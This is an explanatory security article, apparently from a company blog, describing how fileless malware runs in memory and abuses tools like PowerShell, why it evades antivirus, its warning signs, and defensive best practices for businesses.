Fileless malware is a popular means for cyber criminals to infiltrate systems unnoticed. Also known as non-malware, zero-footprint, or macro-attack, it differs from traditional malware in that it does not need to install malicious software to infect a victim's computer.
Instead, it exploits the existing vulnerabilities on the device: The malware embeds itself in the computer's RAM and uses common system tools for its attacks to inject malicious code into normally safe, trustworthy processes, for example javaw.exe or iexplore.exe .
Attack techniques and how fileless malware works
There are many techniques that cyber criminals can use to launch a fileless malware attack. For example through malicious banner advertising, so-called "malvertising". If users click on the ad, they are redirected to a malicious website that appears legitimate and loads Flash, which unfortunately has vulnerabilities. Flash uses the Windows PowerShell tool to execute commands through the command line while it is running in RAM. PowerShell then downloads malicious code from a botnet or other compromised server and executes it, whereupon the code looks for data to send to the attacker.
Since fileless malware does not require a file download, it is quite difficult to detect, block, and remove. It doesn't have an identifiable code or signature that would allow traditional antivirus programs to detect it. It also has no specific behavior, so heuristic scanners cannot detect it. Since the malware exploits the weaknesses of approved applications that are already on the system, it can also undermine protection through application whitelisting - a process that ensures that only approved applications are installed on a computer.
Signs of fileless malware
However, restarting the computer can stop a security breach by fileless malware. This is because the RAM only retains its data when the computer is on. Once it shuts down, the infection is no longer active. However, attackers can still use this vulnerability to steal data from the computer or install other forms of malware to make the vulnerability persist. For example, a hacker can set up scripts that run when the system restarts to continue the attack.
While there are no new files installed or typical tell-tale behavior that would make a fileless malware attack obvious, there are some warning signs to look out for. One of these is unusual network patterns and traces, such as the computer connecting to botnet servers. Watch for signs of a security breach in system memory, as well as other artifacts that may have been left behind by malicious code.
Best practices for protecting against fileless malware
Here are some steps businesses can take to prevent fileless malware infection or to limit the damage in the event of infection:
- No unnecessary functions and applications: Services and program functions that are not used should be deactivated. Companies should also uninstall applications that are not used or that are not necessary for work.
- Economical granting of privileges: Companies should restrict privileges for admin users and only grant users as many authorizations as necessary so that they can do their jobs.
- Regular software updates: All software should always be up to date and updated regularly.
- Network traffic monitoring: Network traffic should be monitored and the activity logs checked for abnormalities.
- Endpoint Protection: Organizations should ensure they have endpoint protection in place and secure each of those devices, including remote and mobile devices, to protect their network.
- PowerShell: Best practices for using and securing PowerShell should also be followed.
- Password hygiene: Passwords should be changed after a fileless malware infection becomes known and after successful cleaning.
- Employee training: In-depth security training for end users can also go a long way in preventing fileless malware infections.
Fileless malware is readily available to criminals because it is often already included in exploit kits. In addition, some hackers offer fileless malware attacks as-a-service. The malware relies on camouflage rather than tenacity, although its flexibility to pair with other malware allows it to do both. Companies should therefore implement a security strategy that includes a layered approach of best practices, security solutions and employee training in order to combat these threats effectively.
[starboxid=6]